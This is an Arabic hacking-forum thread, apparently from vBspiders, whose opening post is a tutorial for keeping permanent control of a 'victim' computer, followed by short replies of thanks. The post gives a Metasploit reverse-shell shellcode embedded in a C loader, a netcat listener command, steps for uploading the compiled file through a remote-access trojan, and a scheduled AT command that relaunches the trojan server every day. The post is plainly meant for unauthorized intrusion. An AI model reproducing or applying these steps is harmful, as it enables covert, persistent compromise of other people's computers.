|
عدم فقدان الضحية بطريقة جديدة و مميزة من اكتشافي عن طريق command AT كالعادة درس اول مرة في المنتديات العربية و انا اعتزل الهاكر اذا يقولي واحد ان فيه درس مثله لذلك ارجوا ذكر اسم الكاتب عند النقل اولا تعريف AT command هي عبارة عن امر مرتبط بزمان محدد على سبيل المثال لو اردنا فتح notepad في منتصف الليل نفتح الدوس ونكتب الامر التالي AT 00:00 /interactive "notepad.exe" 00:00 وقت تنفيذ الامر /interactive يعني الامر يشتغل مرة واحدة لاحقا سوف نتطرق لكيفية تنفيذ الامر في اي يوم من الاسبوع و بصفة دورية notepad.exe الملف الذي نريد فتحه مثال ثاني لو اردنا فتح المسنجر الساعة 3 عصرا نعمل الامر التالي AT 15:00 /interactive "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" ان شاء الله تكونوا فهمتوا الان كيف سيساعدنا هذا الكلام الطريقة هي اننا نرفع السيرفر و نعمل الكومند حتى ينفتح السيرفر يوميا يعني حتى لو فقدنا الضحية السيرفر سينفتح تلقائي و جينا التبليغ يوميا يعني ضحية للابد لذلك نبدا بعمل كونكت للجهاز الضحية بالدوس عن طريق الشل كود نبدا بعمل شل كود نشوف الموقع هذا http://metasploit.com:55555/PAYLOADS...=win32_reverse نعمل مثل في الصورة http://www5.0zz0.com/2009/06/06/16/568580496.jpg ثم http://www6.0zz0.com/2009/06/06/16/369423091.jpg نحفظ الكود و نستبدله بالجزء الملون في الكود التالي #include <stdlib.h> #include <string.h> unsigned char shellcode[] = "\x29\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x80" "\x91\xc8\xad\x83\xeb\xfc\xe2\xf4\x7c\xfb\x23\xe0\ x68\x68\x37\x52" "\x7f\xf1\x43\xc1\xa4\xb5\x43\xe8\xbc\x1a\xb4\xa8\ xf8\x90\x27\x26" "\xcf\x89\x43\xf2\xa0\x90\x23\xe4\x0b\xa5\x43\xac\ x6e\xa0\x08""; int main () { int *ret; ret=(int *)&ret+2; printf("Shellcode Length is : %d",strlen(shellcode)); (*ret)=(int)shellcode; return 0; } الان نحفظ الكود الجديد باسم shellcode.c حمل برنامج devc++ نصبه ثم افتح الملف الجديد سينفتح لك ببرنامج السي ++ اختار Execute ==> compile عندها تتكون عندك ملف تنفيذي اسمه shellcode الان نذهب للدوس ونعمل الامر cd\ ثم الامر nc -l -v -p 21 عوض 21 بالبورت الذي اخترته ( يجب ان يكون لديك النت كات في :c ) ارفع سيرفرك في هذا المسار C:\WINDOWS ارفع الملف التنفيذي في جهاز الضحية ببرنامج اختراقك و شغله ستلاحظ ان الدوس اتصل به الضحية يعني تنفذ الاوامر من الدوس تبعك وتنفذ في جهاز الضحية الان نفذ الامر التالي الان نفذ الامر التالي في الدوس اللي مخترقين بيه الضحية AT 23:30 /EVERY:m,t,w,th,f,s,su C:\WINDOWS\server.exe m,t,w,th,f,s,su عوضها ب l,ma,me,j,v,s,d اذا كان جهازك يدعم اللغة الفرنسية استبدل 23:30 بالوقت الذي تريد تشغيل فيه السيرفر نفترض ان الاتصال انقطع مع الضحية فان السيرفر سيشغل نفسه ذاتيا كل يوم الساعة 23:30 و مبروك عليك ضحية دائمة اعرف ان الدرس صعب قليلا لذلك انا موجود لاي استفسار greetz to : Password |
يعطيك العافية ودي دروس تفتح القلب في انتظار جديدك يالغالي |
درس جميل جدا والله شكرا |
very good 20/20 :) |
درس جميل جدا شكرا لك |
درس رائع من انسان اروع شكرا يا باشا على الطريقه والشرح المفهوم بطل جاري التطبيق |
يعطيك العافيه على الدرس ما قصرت واااصل |
درس ابدآآع يالغآلي ~ لاتحرمنا جديدك ~ بآرك الله فيك ~ :) |
الله يزوجك ,, بطل |
يا الغالي انا فهمت الدرس واقدر اطبقه لكن احس في لخبطه في الاكواد يا ليت ترفقها في مستند نص يا الغالي تقبل احترامي |
مشكوووووووووووور |
أخي ماهو النت كات ؟؟؟ و كيف أستعمله ؟؟ وشكرا لك أخي بطل |
مشكوووووووور اخوي |
شرح مميز ولااروع بتوفيق واصل الى الامام |
يعطيك العافيه وماقصرت |
| الساعة الآن 03:05 PM |
[ vBspiders.Com Network ]